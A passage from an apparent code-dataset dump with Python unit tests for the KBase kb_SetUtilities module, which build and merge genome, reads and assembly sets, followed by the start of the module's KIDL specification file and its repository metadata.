str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n # feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n # feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n # feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n # feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n 
num_merged_genomes = 4\n\n        # GenomeSet 1\n        genomeSet_obj_1 = {'description': 'test genomeSet 1',\n                           'elements': {'genome_0': {'ref': genome_ref_0}\n                                        }\n                           }\n        # GenomeSet 2\n        genomeSet_obj_2 = {'description': 'test genomeSet 2',\n                           'elements': {'genome_1': {'ref': genome_ref_1},\n                                        'genome_2': {'ref': genome_ref_2},\n                                        }\n                           }\n        provenance = [{}]\n        genomeSet_1_info = self.getWsClient().save_objects({\n            'workspace': self.getWsName(),\n            'objects': [\n                {\n                    'type': 'KBaseSearch.GenomeSet',\n                    'data': genomeSet_obj_1,\n                    'name': 'test_genomeSet_1',\n                    'meta': {},\n                    'provenance': provenance\n                }\n            ]})[0]\n        genomeSet_ref_1 = str(genomeSet_1_info[WSID_I]) + '/' + str(\n            genomeSet_1_info[OBJID_I]) + '/' + str(genomeSet_1_info[VERSION_I])\n\n        genomeSet_2_info = self.getWsClient().save_objects({\n            'workspace': self.getWsName(),\n            'objects': [\n                {\n                    'type': 'KBaseSearch.GenomeSet',\n                    'data': genomeSet_obj_2,\n                    'name': 'test_genomeSet_2',\n                    'meta': {},\n                    'provenance': provenance\n                }\n            ]})[0]\n\n        genomeSet_ref_2 = str(genomeSet_2_info[WSID_I]) + '/' + str(\n            genomeSet_2_info[OBJID_I]) + '/' + str(genomeSet_2_info[VERSION_I])\n\n        # run method\n        base_output_name = method + '_output'\n        params = {\n            'workspace_name': self.getWsName(),\n            'input_genome_refs': [genomeSet_ref_2, genome_ref_3],\n            'input_genomeset_ref': genomeSet_ref_1,\n            'output_name': base_output_name,\n            'desc': 'test'\n        }\n        result = self.getImpl().KButil_Add_Genomes_to_GenomeSet(self.getContext(), params)\n        print('RESULT:')\n        pprint(result)\n\n        # check the output\n        output_name = base_output_name\n        output_type = 'KBaseSearch.GenomeSet'\n        output_ref = self.getWsName() + '/' + output_name\n        info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n        self.assertEqual(len(info_list), 1)\n        output_info = info_list[0]\n        self.assertEqual(output_info[1], output_name)\n        self.assertEqual(output_info[2].split('-')[0], output_type)\n        output_obj = \\\n            self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n        self.assertEqual(len(list(output_obj['elements'].keys())), num_merged_genomes)\n        pass\n\n    #### test_KButil_Remove_Genomes_from_GenomeSet_01():\n    ##\n    # HIDE @unittest.skip(\"skipped test_KButil_Remove_Genomes_from_GenomeSet_01()\") # uncomment to skip\n    def test_KButil_Remove_Genomes_from_GenomeSet_01(self):\n        method = 'KButil_Remove_Genomes_from_GenomeSet_01'\n        msg = \"RUNNING: \" + method + \"()\"\n        print(\"\\n\\n\" + msg)\n        print(\"=\" * len(msg) + \"\\n\\n\")\n\n        # input_data\n        genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n        genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n        genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n        genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n        genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n        genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n        genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n        genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n        # feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n        # feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n        # feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n        # feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n        num_final_genomes = 1\n\n        # GenomeSet 1\n        genomeSet_obj_1 = {'description': 'test genomeSet 1',\n                           'elements': {'genome_0': 
{'ref': genome_ref_0},\n 'genome_1': {'ref': genome_ref_1},\n 'genome_2': {'ref': genome_ref_2},\n 'genome_3': {'ref': genome_ref_3},\n }\n }\n provenance = [{}]\n genomeSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWs2Name(),\n 'objects': [\n {\n 'type': 'KBaseSearch.GenomeSet',\n 'data': genomeSet_obj_1,\n 'name': 'test_genomeSet_'+method+'.GenomeSet',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n genomeSet_ref_1 = str(genomeSet_info[WSID_I]) + '/' + str(\n genomeSet_info[OBJID_I]) + '/' + str(genomeSet_info[VERSION_I])\n\n # run method\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_genome_refs': [genome_ref_1, genome_ref_2],\n 'nonlocal_genome_names': ['GCF_000022285.1_ASM2228v1_genomic'],\n 'input_genomeset_ref': genomeSet_ref_1,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Remove_Genomes_from_GenomeSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(list(output_obj['elements'].keys())), num_final_genomes)\n pass\n\n #### test_KButil_Build_ReadsSet_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Build_ReadsSet_01()\") # uncomment to skip\n def test_KButil_Build_ReadsSet_01(self):\n method = 'KButil_Build_ReadsSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # figure out where the test data lives\n pe_lib_info_1 = self.getPairedEndLibInfo('test_quick', lib_i=0)\n pprint(pe_lib_info_1)\n pe_lib_info_2 = self.getPairedEndLibInfo('small', lib_i=1)\n pprint(pe_lib_info_2)\n pe_lib_info_3 = self.getPairedEndLibInfo('small_2', lib_i=2)\n pprint(pe_lib_info_3)\n\n # run method\n input_refs = [str(pe_lib_info_1[6]) + '/' + str(pe_lib_info_1[0]),\n str(pe_lib_info_2[6]) + '/' + str(pe_lib_info_2[0]),\n str(pe_lib_info_3[6]) + '/' + str(pe_lib_info_3[0])\n ]\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_refs': input_refs,\n 'output_name': base_output_name,\n 'desc': 'test build readsSet'\n }\n result = self.getImpl().KButil_Build_ReadsSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSets.ReadsSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n readsLib_info = info_list[0]\n self.assertEqual(readsLib_info[1], output_name)\n self.assertEqual(readsLib_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), 3)\n pass\n\n #### test_KButil_Merge_MultipleReadsSets_to_OneReadsSet_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Merge_MultipleReadsSets_to_OneReadsSet_01()\") # uncomment to skip\n def 
test_KButil_Merge_MultipleReadsSets_to_OneReadsSet_01(self):\n method = 'KButil_Merge_MultipleReadsSets_to_OneReadsSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # figure out where the test data lives\n lib_basenames = ['test_quick', 'small', 'small_2']\n pe_lib_info = []\n lib_refs = []\n for lib_i, lib_basename in enumerate(lib_basenames):\n this_info = self.getPairedEndLibInfo(lib_basename, lib_i=lib_i)\n pe_lib_info.append(this_info)\n pprint(this_info)\n\n lib_refs.append(str(this_info[6]) + '/' + str(this_info[0]) + '/' + str(this_info[4]))\n\n # make readsSet 1\n items = [{'ref': lib_refs[0],\n 'label': lib_basenames[0]\n },\n {'ref': lib_refs[1],\n 'label': lib_basenames[1]\n }]\n desc = 'test ReadsSet 1'\n readsSet_obj_1 = {'description': desc,\n 'items': items\n }\n name = 'TEST_READSET_1'\n new_obj_set_info = self.wsClient.save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSets.ReadsSet',\n 'data': readsSet_obj_1,\n 'name': name,\n 'meta': {},\n 'provenance': [\n {\n 'service': 'kb_SetUtilities',\n 'method': 'test_kb_SetUtilities'\n }\n ]\n }]\n })[0]\n readsSet_ref_1 = str(new_obj_set_info[6]) + '/' + str(new_obj_set_info[0]) + '/' + str(\n new_obj_set_info[4])\n\n # make readsSet 2\n items = [{'ref': lib_refs[2],\n 'label': lib_basenames[2]\n }]\n desc = 'test ReadsSet 2'\n readsSet_obj_2 = {'description': desc,\n 'items': items\n }\n name = 'TEST_READSET_2'\n new_obj_set_info = self.wsClient.save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSets.ReadsSet',\n 'data': readsSet_obj_2,\n 'name': name,\n 'meta': {},\n 'provenance': [\n {\n 'service': 'kb_SetUtilities',\n 'method': 'test_kb_SetUtilities'\n }\n ]\n }]\n })[0]\n readsSet_ref_2 = str(new_obj_set_info[6]) + '/' + str(new_obj_set_info[0]) + '/' + str(\n new_obj_set_info[4])\n\n # run method\n input_refs = [readsSet_ref_1, readsSet_ref_2]\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_refs': input_refs,\n 'output_name': base_output_name,\n 'desc': 'test merge'\n }\n result = self.getImpl().KButil_Merge_MultipleReadsSets_to_OneReadsSet(self.getContext(),\n params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSets.ReadsSet'\n info_list = self.getWsClient().get_object_info_new(\n {'objects': [{'ref': self.getWsName() + '/' + output_name}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_ref = self.getWsName() + '/' + output_name\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), 3)\n pass\n\n #### test_KButil_Build_AssemblySet_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Build_AssemblySet_01()\") # uncomment to skip\n def test_KButil_Build_AssemblySet_01(self):\n method = 'KButil_Build_AssemblySet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # upload test data\n try:\n auClient = AssemblyUtil(self.callbackURL, token=self.token)\n except Exception as e:\n raise ValueError(\n 'Unable to instantiate auClient with callbackURL: ' + self.callbackURL + ' ERROR: ' + str(\n e))\n ass_file_1 = 'assembly_1.fa'\n ass_file_2 = 'assembly_2.fa'\n ass_path_1 = 
os.path.join(self.scratch, ass_file_1)\n ass_path_2 = os.path.join(self.scratch, ass_file_2)\n shutil.copy(os.path.join(\"data\", ass_file_1), ass_path_1)\n shutil.copy(os.path.join(\"data\", ass_file_2), ass_path_2)\n ass_ref_1 = auClient.save_assembly_from_fasta({\n 'file': {'path': ass_path_1},\n 'workspace_name': self.getWsName(),\n 'assembly_name': 'assembly_1'\n })\n ass_ref_2 = auClient.save_assembly_from_fasta({\n 'file': {'path': ass_path_2},\n 'workspace_name': self.getWsName(),\n 'assembly_name': 'assembly_2'\n })\n\n # run method\n input_refs = [ass_ref_1, ass_ref_2]\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_refs': input_refs,\n 'output_name': base_output_name,\n 'desc': 'test build assemblySet'\n }\n result = self.getImpl().KButil_Build_AssemblySet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSets.AssemblySet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n assemblySet_info = info_list[0]\n self.assertEqual(assemblySet_info[1], output_name)\n self.assertEqual(assemblySet_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), len(input_refs))\n pass\n\n #### test_KButil_Batch_Create_ReadsSet_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Batch_Create_ReadsSet_01()\") # uncomment to skip\n def test_KButil_Batch_Create_ReadsSet_01(self):\n method = 'KButil_Batch_Create_ReadsSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # upload test data\n pe_lib_info_1 = self.getPairedEndLibInfo('test_quick', lib_i=0)\n pprint(pe_lib_info_1)\n pe_lib_info_2 = self.getPairedEndLibInfo('small', lib_i=1)\n pprint(pe_lib_info_2)\n pe_lib_info_3 = self.getPairedEndLibInfo('small_2', lib_i=2)\n pprint(pe_lib_info_3)\n\n # run method\n # name_pattern = ''\n # expected_readsSet_length = 3\n name_pattern = 'test-*'\n expected_readsSet_length = 3\n base_output_name = method + '_output'\n output_name = base_output_name+'-01.ReadsSet'\n params = {\n 'workspace_name': self.getWsName(),\n 'name_pattern': name_pattern,\n 'output_name': output_name,\n 'desc': 'test batch create readsSet'\n }\n result = self.getImpl().KButil_Batch_Create_ReadsSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_type = 'KBaseSets.ReadsSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n readsSet_info = info_list[0]\n self.assertEqual(readsSet_info[1], output_name)\n self.assertEqual(readsSet_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), expected_readsSet_length)\n pass\n\n #### test_KButil_Batch_Create_ReadsSet_02()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Batch_Create_ReadsSet_02()\") # uncomment to skip\n def test_KButil_Batch_Create_ReadsSet_02(self):\n method = 'KButil_Batch_Create_ReadsSet_02'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # upload 
test data\n pe_lib_info_1 = self.getPairedEndLibInfo('test_quick', lib_i=0)\n pprint(pe_lib_info_1)\n pe_lib_info_2 = self.getPairedEndLibInfo('small', lib_i=1)\n pprint(pe_lib_info_2)\n pe_lib_info_3 = self.getPairedEndLibInfo('small_2', lib_i=2)\n pprint(pe_lib_info_3)\n\n se_lib_info_1 = self.getSingleEndLibInfo('test_quick', lib_i=0)\n pprint(se_lib_info_1)\n se_lib_info_2 = self.getSingleEndLibInfo('small', lib_i=1)\n pprint(se_lib_info_2)\n se_lib_info_3 = self.getSingleEndLibInfo('small_2', lib_i=2)\n pprint(se_lib_info_3)\n\n # run method\n # name_pattern = ''\n # expected_readsSet_length = 3\n name_pattern = 'test-*.se.reads'\n expected_readsSet_length = 3\n base_output_name = method + '_output'\n output_name = base_output_name+'-02.ReadsSet'\n params = {\n 'workspace_name': self.getWsName(),\n 'name_pattern': name_pattern,\n 'output_name': output_name,\n 'desc': 'test batch create readsSet'\n }\n result = self.getImpl().KButil_Batch_Create_ReadsSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_type = 'KBaseSets.ReadsSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n readsSet_info = info_list[0]\n self.assertEqual(readsSet_info[1], output_name)\n self.assertEqual(readsSet_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), expected_readsSet_length)\n pass\n\n #### test_KButil_Batch_Create_ReadsSet_03()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Batch_Create_ReadsSet_03()\") # uncomment to skip\n def test_KButil_Batch_Create_ReadsSet_03(self):\n method = 'KButil_Batch_Create_ReadsSet_03'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # upload test data\n pe_lib_info_1 = self.getPairedEndLibInfo('test_quick', lib_i=0)\n pprint(pe_lib_info_1)\n pe_lib_info_2 = self.getPairedEndLibInfo('small', lib_i=1)\n pprint(pe_lib_info_2)\n pe_lib_info_3 = self.getPairedEndLibInfo('small_2', lib_i=2)\n pprint(pe_lib_info_3)\n\n se_lib_info_1 = self.getPairedEndLibInfo('test_quick', lib_i=0)\n pprint(se_lib_info_1)\n se_lib_info_2 = self.getPairedEndLibInfo('small', lib_i=1)\n pprint(se_lib_info_2)\n se_lib_info_3 = self.getPairedEndLibInfo('small_2', lib_i=2)\n pprint(se_lib_info_3)\n\n # run method\n # name_pattern = ''\n # expected_readsSet_length = 3\n name_pattern = 'test-*'\n expected_readsSet_length = 3\n base_output_name = method + '_output'\n output_name = base_output_name+'-03.ReadsSet'\n params = {\n 'workspace_name': self.getWsName(),\n 'name_pattern': name_pattern,\n 'output_name': output_name,\n 'desc': 'test batch create readsSet'\n }\n result = self.getImpl().KButil_Batch_Create_ReadsSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_type = 'KBaseSets.ReadsSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n readsSet_info = info_list[0]\n self.assertEqual(readsSet_info[1], output_name)\n self.assertEqual(readsSet_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), 
expected_readsSet_length)\n pass\n\n #### test_KButil_Batch_Create_AssemblySet_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Batch_Create_AssemblySet_01()\") # uncomment to skip\n def test_KButil_Batch_Create_AssemblySet_01(self):\n method = 'KButil_Batch_Create_AssemblySet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # upload test data\n try:\n auClient = AssemblyUtil(self.callbackURL, token=self.token)\n except Exception as e:\n raise ValueError(\n 'Unable to instantiate auClient with callbackURL: ' + self.callbackURL + ' ERROR: ' + str(\n e))\n ass_file_1 = 'assembly_1.fa'\n ass_file_2 = 'assembly_2.fa'\n ass_path_1 = os.path.join(self.scratch, ass_file_1)\n ass_path_2 = os.path.join(self.scratch, ass_file_2)\n shutil.copy(os.path.join(\"data\", ass_file_1), ass_path_1)\n shutil.copy(os.path.join(\"data\", ass_file_2), ass_path_2)\n ass_ref_1 = auClient.save_assembly_from_fasta({\n 'file': {'path': ass_path_1},\n 'workspace_name': self.getWsName(),\n 'assembly_name': 'assembly_1-FOO.Assembly'\n })\n ass_ref_2 = auClient.save_assembly_from_fasta({\n 'file': {'path': ass_path_2},\n 'workspace_name': self.getWsName(),\n 'assembly_name': 'assembly_2-BAR.Assembly'\n })\n\n # run method\n # name_pattern = ''\n # expected_assemblySet_length = 2\n name_pattern = 'BAR*bly'\n expected_assemblySet_length = 1\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'name_pattern': name_pattern,\n 'output_name': base_output_name,\n 'desc': 'test batch create assemblySet'\n }\n result = self.getImpl().KButil_Batch_Create_AssemblySet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSets.AssemblySet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n assemblySet_info = info_list[0]\n self.assertEqual(assemblySet_info[1], output_name)\n self.assertEqual(assemblySet_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), expected_assemblySet_length)\n pass\n\n #### test_KButil_Batch_Create_GenomeSet_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Batch_Create_GenomeSet_01()\") # uncomment to skip\n def test_KButil_Batch_Create_GenomeSet_01(self):\n method = 'KButil_Batch_Create_GenomeSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n # genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n # genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n # genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n # genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n # feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n # feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n # feature_id_2 = 
'AOR14_RS04755' # F0 ATP Synthase subunit B\n # feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_genomes = 2\n\n # run method\n # name_pattern = ''\n # expected_genomeSet_length = 2\n name_pattern = '000306*_ASM'\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'name_pattern': name_pattern,\n 'output_name': base_output_name,\n 'desc': 'test batch create genomeSet'\n }\n result = self.getImpl().KButil_Batch_Create_GenomeSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n # output_type = 'KBaseSets.GenomeSet'\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n genomeSet_info = info_list[0]\n self.assertEqual(genomeSet_info[1], output_name)\n self.assertEqual(genomeSet_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n # self.assertEqual(len(output_obj['items']), expected_genomeSet_length)\n self.assertEqual(len(output_obj['elements'].keys()), 1)\n pass\n"
},
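The two Batch_Create tests above drive object selection with a glob-style `name_pattern` ('BAR*bly', '000306*_ASM'). The module implementation itself is not part of this record, so the following is only a minimal Python sketch of how such matching could behave, assuming the pattern is allowed to match anywhere inside an object name (the helper `filter_by_name_pattern` is hypothetical, not from the repo):

```python
# Minimal sketch, not the actual kb_SetUtilities code: illustrates
# glob-style name_pattern matching as the tests above exercise it,
# assuming the pattern may match anywhere inside the object name.
from fnmatch import fnmatch

def filter_by_name_pattern(names, name_pattern):
    pattern = '*' + name_pattern + '*'  # allow a substring-style match
    return [n for n in names if fnmatch(n, pattern)]

names = ['assembly_1-FOO.Assembly', 'assembly_2-BAR.Assembly']
print(filter_by_name_pattern(names, 'BAR*bly'))
# ['assembly_2-BAR.Assembly'] -- one hit, matching the test's expected set size
```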
{
"alpha_fraction": 0.6960428953170776,
"alphanum_fraction": 0.6960428953170776,
"avg_line_length": 31.08730125427246,
"blob_id": "d6908379bfe0df3e40eaf04eb6f3c2c078e04bea",
"content_id": "111461a3fdfc35eebc565cf2d998ab36c8fa4e4b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 12130,
"license_type": "permissive",
"max_line_length": 208,
"num_lines": 378,
"path": "/kb_SetUtilities.spec",
"repo_name": "kbaseapps/kb_SetUtilities",
"src_encoding": "UTF-8",
"text": "/*\n** A KBase module: kb_SetUtilities\n**\n** This module contains basic utilities for set manipulation, originally extracted\n** from kb_util_dylan\n**\n*/\n\nmodule kb_SetUtilities {\n\n /* \n ** The workspace object refs are of form:\n **\n ** objects = ws.get_objects([{'ref': params['workspace_id']+'/'+params['obj_name']}])\n **\n ** \"ref\" means the entire name combining the workspace id and the object name\n ** \"id\" is a numerical identifier of the workspace or object, and should just be used for workspace\n ** \"name\" is a string identifier of a workspace or object. This is received from Narrative.\n */\n typedef string workspace_name;\n typedef string sequence;\n typedef string data_obj_name;\n typedef string data_obj_ref;\n typedef int bool;\n\n\n /* KButil_Localize_GenomeSet()\n **\n ** Method for creating Genome Set with all local Genomes\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_ref;\n data_obj_name output_name;\n } KButil_Localize_GenomeSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Localize_GenomeSet_Output;\n\n funcdef KButil_Localize_GenomeSet (KButil_Localize_GenomeSet_Params params) returns (KButil_Localize_GenomeSet_Output) authentication required;\n\n\n /* KButil_Localize_FeatureSet()\n **\n ** Method for creating Feature Set with all local Genomes\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_ref;\n data_obj_name output_name;\n } KButil_Localize_FeatureSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Localize_FeatureSet_Output;\n\n funcdef KButil_Localize_FeatureSet (KButil_Localize_FeatureSet_Params params) returns (KButil_Localize_FeatureSet_Output) authentication required;\n\n\n /* KButil_Merge_FeatureSet_Collection()\n **\n ** Method for merging FeatureSets\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_refs;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Merge_FeatureSet_Collection_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Merge_FeatureSet_Collection_Output;\n\n funcdef KButil_Merge_FeatureSet_Collection (KButil_Merge_FeatureSet_Collection_Params params) returns (KButil_Merge_FeatureSet_Collection_Output) authentication required;\n\n\n /* KButil_Slice_FeatureSets_by_Genomes()\n **\n ** Method for Slicing a FeatureSet or FeatureSets by a Genome, Genomes, or GenomeSet\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_featureSet_refs;\n\tdata_obj_ref input_genome_refs;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Slice_FeatureSets_by_Genomes_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Slice_FeatureSets_by_Genomes_Output;\n\n funcdef KButil_Slice_FeatureSets_by_Genomes (KButil_Slice_FeatureSets_by_Genomes_Params params) returns (KButil_Slice_FeatureSets_by_Genomes_Output) authentication required;\n\n\n /* KButil_Logical_Slice_Two_FeatureSets()\n **\n ** Method for Slicing Two FeatureSets by Venn overlap\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_featureSet_ref_A;\n\tdata_obj_ref input_featureSet_ref_B;\n\tstring operator;\n\tstring desc;\n data_obj_name output_name;\n } KButil_Logical_Slice_Two_FeatureSets_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } 
